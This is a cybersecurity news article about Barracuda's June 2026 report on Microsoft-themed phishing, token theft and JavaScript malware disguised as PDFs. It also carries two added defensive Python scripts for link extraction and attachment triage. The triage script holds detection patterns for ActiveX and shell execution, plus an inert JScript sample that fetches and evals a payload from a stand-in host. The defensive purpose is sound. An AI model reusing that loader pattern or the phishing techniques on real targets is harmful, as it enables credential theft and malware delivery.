Barracuda warns of Microsoft phishing & malware rise

Tue, 30th Jun 2026
Mark Tarre, News Chief

Barracuda has published its June 2026 Email Threat Radar, which identifies a rise in phishing attacks that use genuine Microsoft login pages, PDF attachments and malware delivery techniques.

The report describes several campaigns targeting organisations and employees, including attacks designed to steal session tokens as well as passwords, and emails that progress from credential theft to delivering malicious scripts and fileless malware.

One notable technique involved a phishing campaign run through the Tycoon 2FA phishing-as-a-service platform. Recipients received an email warning that their inbox was nearly full and were prompted to release held messages through a button embedded in what appeared to be a calendar invite.

The link took users to a genuine Microsoft login page, with the sign-in flow routed through attacker-controlled infrastructure. Once users authenticated, the attackers could capture the resulting session tokens and the access permissions granted with them, giving them access to email, online files and linked Microsoft 365 services. Victims were then asked to enter their credentials again on a fake page, so the attackers collected passwords as well.

This approach differs from standard phishing attempts because the address the victim sees, and the address that URL reputation checks evaluate, is a genuine Microsoft domain rather than an imitation page. The use of calendar invites also makes the campaign harder to detect through traditional email defences, since links inside invitations are inspected far less often than links in message bodies.

PDF lure

Researchers also reported device code phishing attacks in which suspicious links were moved from the email body into a PDF attachment. The message asked recipients to open an attachment tied to a compliance or payment issue, and the PDF then directed them to a fake device authentication process.

Unlike earlier device code phishing operations that requested real codes from Microsoft's application programming interfaces, this campaign generated fake device codes locally in the browser, so no code ever came from Microsoft. The pages mimicked the legitimate device code authorisation flow used when linking apps and devices to Microsoft accounts.

The campaign also used CAPTCHA to limit automated scanning and sandbox analysis. Its phishing pages expired automatically after a set period, reducing the time available for investigators and security teams to inspect the infrastructure.

Split-click method

Another campaign used what Barracuda described as a rare split-click technique. The email warned that a user's mailbox was full and included a single "Resolve Issue" button, but the outcome changed depending on where the user clicked.

Clicking the top half of the button opened a legitimate Microsoft page, while clicking the bottom half sent the user through a malicious redirect. That path opened a browser-generated blob URL before directing the target to a phishing page linked to the Sneaky 2FA phishing-as-a-service platform, where credentials and other information were harvested.

Giving a single button two outcomes appears intended to evade automated link analysis tools, which may follow only one destination and see the harmless one. Blob URLs are also harder for conventional inspection and blocking tools to analyse because they are created dynamically by the browser and exist only within the page that created them, so there is no server-side URL to look up or block.
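As an added example, not code from Barracuda's report or from this site, the following Python script does the kind of inspection the calendar-invite and split-click campaigns above call for: it walks every MIME part of a message, pulls URLs out of text/calendar parts (whether the invite is the body or an .ics attachment), and reads the separate targets of each `<area>` in an HTML image map, which is one way a single button image can be given two click regions. The sample message, the .invalid domains and the image-map construction are assumptions made for the demonstration; the report does not say how the split-click button was actually built.

```python
"""Pull every clickable destination out of an email, including text/calendar
parts and image-map areas, and flag any single 'button' whose areas lead to
different hosts. Added example; the sample message is constructed."""
import email
import re
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s<>\"')]+")


class ClickTargetParser(HTMLParser):
    """Collect hrefs from <a> tags and from <area> tags grouped by their <map>."""

    def __init__(self):
        super().__init__()
        self.anchors = []      # hrefs of <a> elements
        self.maps = {}         # map name -> hrefs of its <area> elements
        self._map = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "map":
            self._map = a.get("name") or a.get("id") or "<anonymous>"
            self.maps.setdefault(self._map, [])
        elif tag == "area" and self._map is not None and a.get("href"):
            self.maps[self._map].append(a["href"])
        elif tag == "a" and a.get("href"):
            self.anchors.append(a["href"])

    def handle_endtag(self, tag):
        if tag == "map":
            self._map = None


def host_of(url):
    return (urlsplit(url).hostname or "").lower()


def analyse_message(raw):
    """Return HTML links, calendar-part links and image maps with >1 destination host."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    out = {"html_links": [], "calendar_links": [], "split_buttons": []}
    for part in msg.walk():                       # body parts and attachments alike
        ctype = part.get_content_type()
        if ctype == "text/html":
            p = ClickTargetParser()
            p.feed(part.get_content())
            out["html_links"].extend(p.anchors)
            for name, hrefs in p.maps.items():
                out["html_links"].extend(hrefs)
                hosts = sorted({host_of(h) for h in hrefs})
                if len(hosts) > 1:                # one image, several destinations
                    out["split_buttons"].append({"map": name, "hosts": hosts})
        elif ctype == "text/calendar":            # invite body or .ics attachment
            out["calendar_links"].extend(URL_RE.findall(part.get_content()))
    return out


def build_sample():
    """Constructed lure: a mailbox-full notice with a two-area button plus an .ics invite."""
    msg = EmailMessage()
    msg["From"] = "notifications@mailer.example.invalid"
    msg["To"] = "user@example.com"
    msg["Subject"] = "Action required: mailbox almost full"
    msg.set_content("Your mailbox is almost full. Open this message in an HTML client.")
    msg.add_alternative(
        '<p>Your mailbox is almost full.</p>'
        '<img src="cid:button" usemap="#resolve" alt="Resolve Issue">'
        '<map name="resolve">'
        '<area shape="rect" coords="0,0,200,20" href="https://login.microsoftonline.com/">'
        '<area shape="rect" coords="0,20,200,40" href="https://redirect.example.invalid/r?id=123">'
        '</map>',
        subtype="html",
    )
    ics = "\r\n".join([
        "BEGIN:VCALENDAR", "VERSION:2.0", "PRODID:-//constructed//EN", "BEGIN:VEVENT",
        "UID:1@example.invalid", "DTSTART:20260701T090000Z",
        "SUMMARY:Release held messages",
        "DESCRIPTION:Inbox nearly full. Release held mail: https://release.example.invalid/q?u=abc",
        "END:VEVENT", "END:VCALENDAR",
    ])
    msg.add_attachment(ics, subtype="calendar", filename="invite.ics")
    return msg.as_bytes()


if __name__ == "__main__":
    print(analyse_message(build_sample()))
```

The point of grouping by `<map>` rather than just listing URLs is that a flat URL list looks normal here (one Microsoft link, one redirector); it is the pairing of two hosts behind one image that is the signal. Links found in the calendar part should be fed through the same reputation and sandbox checks as links in the body.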

Malware shift

The report also points to a broader shift in phishing campaigns from credential theft to malware delivery. In one example, a fake invoice notification led victims to what appeared to be a harmless file called "Invoice.pdf (11.3 KB)", but the download was actually a malicious JavaScript file.

The script concealed malicious code through steganography and obfuscation. Once executed, it could load additional malware, gather system information, establish persistence and communicate with attacker-controlled infrastructure.

A separate campaign impersonated the Social Security Administration to distribute another JavaScript file disguised as a payment receipt PDF. In that case, the script reconstructed a hidden web address at runtime, fetched a second-stage payload from a remote server and ran it directly in memory using Windows ActiveX components, the COM objects available to scripts run by Windows Script Host, so the payload never had to be written to disk.

By running in memory and avoiding obvious file drops, such malware can be less visible to traditional security tools. These methods can be used to deploy credential stealers, banking trojans and other malicious software.
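An added example, not code from the report: a Python triage routine for attachments of the kind described in the two campaigns above. It checks whether the file name claims to be a PDF while the real extension is a script type, whether a file with a .pdf extension actually starts with the %PDF- header, and scores the content for the behaviours the report describes (ActiveX instantiation, an HTTP fetch, a URL rebuilt from fragments, and eval of the response). The indicator names, the "Invoice.pdf.js" naming pattern and the JScript sample, which points at a .invalid domain and is only ever treated as data, are constructed for this example.

```python
"""Triage an email attachment that presents itself as a PDF: compare the claimed
type with the real extension and file header, then score the content for the
WSH/JScript behaviours described in the report. Added example; samples are constructed."""
import re

PDF_MAGIC = b"%PDF-"
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta"}

# Heuristic indicators; the names are this example's own labels.
INDICATORS = {
    "activex": re.compile(r"new\s+ActiveXObject\s*\(", re.I),
    "http_fetch": re.compile(r"XMLHTTP|WinHttpRequest|InternetExplorer\.Application", re.I),
    "string_rebuild": re.compile(r"fromCharCode|\.reverse\(\)|\.join\(", re.I),
    "dynamic_eval": re.compile(r"\b(eval|Function)\s*\(", re.I),
    "shell_exec": re.compile(r"WScript\.Shell|Shell\.Application", re.I),
}


def triage(filename: str, data: bytes) -> dict:
    """Return a verdict ('block', 'review' or 'clean') with the reasons behind it."""
    name = filename.lower().strip()
    stem, dot, tail = name.rpartition(".")
    ext = "." + tail if dot else ""
    claims_pdf = ".pdf" in name and ext != ".pdf"     # e.g. "invoice.pdf.js"
    header_is_pdf = data.startswith(PDF_MAGIC)
    text = data.decode("utf-8", errors="replace")
    hits = [k for k, rx in INDICATORS.items() if rx.search(text)]

    reasons = []
    if claims_pdf:
        reasons.append(f"name suggests PDF but real extension is {ext or 'none'}")
    if ext == ".pdf" and not header_is_pdf:
        reasons.append("extension .pdf but no %PDF- header")
    if ext in SCRIPT_EXTS:
        reasons.append("Windows Script Host extension")
    if hits:
        reasons.append("script indicators: " + ", ".join(hits))

    if claims_pdf or (ext in SCRIPT_EXTS and hits) or (not header_is_pdf and len(hits) >= 2):
        verdict = "block"
    elif reasons:
        verdict = "review"
    else:
        verdict = "clean"
    return {"file": filename, "verdict": verdict, "indicators": hits, "reasons": reasons}


# Constructed sample: inert JScript that rebuilds a URL from a reversed array,
# fetches it through MSXML and evals the response. The domain is .invalid by design
# and the text is only ever scanned, never executed.
SAMPLE_JS = b"""
var parts = ["stage2", "/", "payload.example.invalid", "//", "https:"];
var url = parts.reverse().join("");
var req = new ActiveXObject("MSXML2.XMLHTTP");
req.open("GET", url, false);
req.send();
eval(req.responseText);
"""

# Constructed sample: a minimal real PDF header, so the file is what its name says.
SAMPLE_PDF = b"%PDF-1.7\n1 0 obj << /Type /Catalog >> endobj\n%%EOF\n"

if __name__ == "__main__":
    for fname, blob in [("Invoice.pdf.js", SAMPLE_JS), ("receipt.pdf", SAMPLE_PDF)]:
        print(triage(fname, blob))
```

Two design choices matter here. The name check is deliberately independent of the content check, because a mail gateway may only see the attachment name before download completes, and the "(11.3 KB)" style display name in the lure is exactly what the name check targets. The content scoring is string-based and will miss heavier obfuscation, which is why a script extension alone is already enough for "review": in-memory execution leaves little for endpoint tools to catch later, so the cheapest control is to stop script attachments at the gateway.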

Researchers also observed a multi-step Microsoft impersonation attack in which an HTML file led the recipient to a fake OneDrive page and then to an Excel login screen. The layered redirection was used to disguise the malicious intent and increase the likelihood of credential theft.

The report recommends that organisations protect identities and session tokens as well as passwords, and extend detection beyond standard email scanning to include calendar invites, attachments and login flows. It also recommends improving attachment and endpoint protection and updating staff training to reflect phishing methods that can bypass long-established controls.

Among the more striking findings was the extent to which attackers used real services, expiring infrastructure and browser-based techniques to make phishing pages harder to detect and investigate.